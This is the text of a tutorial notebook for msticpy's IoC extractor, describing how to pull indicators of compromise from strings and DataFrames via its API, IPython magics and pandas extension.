Path: blob/master/tutorials-and-examples/feature-tutorials/IoCExtract.ipynb
3253 views
Title: msticpy - IoC Extraction
Description:
This class allows you to extract IoC patterns from a string or a DataFrame. Several patterns are built in to the class and you can override these or supply new ones.
You must have msticpy installed to run this notebook:
Looking for IoC in a String
Here we:
Get a commandline from our data set.
Pass it to the IoC Extractor
View the results
If we have a DataFrame, look for IoCs in the whole data set
You can replace the data= parameter to ioc_extractor.extract() to pass other data frames. Use the columns parameter to specify which column or columns that you want to search.
IoCExtractor API
Predefined Regex Patterns
extract_df()
extract_df functions identically to extract with a data parameter. It may be more convenient to use this when you know that your input is a DataFrame
SourceIndex column allows you to merge the results with the input DataFrame
Where an input row has multiple IoC matches the output of this merge will result in duplicate rows from the input (one per IoC match). The previous index is preserved in the second column (and in the SourceIndex column).
Note: you will need to set the type of the SourceIndex column. In the example below case we are matching with the default numeric index so we force the type to be numeric. In cases where you are using an index of a different dtype you will need to convert the SourceIndex (dtype=object) to match the type of your index column.
IPython magic
You can use the line magic %ioc or cell magic %%ioc to extract IoCs from text pasted directly into a cell
The ioc magic supports the following options:
Pandas Extension
The decoding functionality is also available in a pandas extension mp_ioc. This supports a single method extract().
This supports the same syntax as extract (described earlier).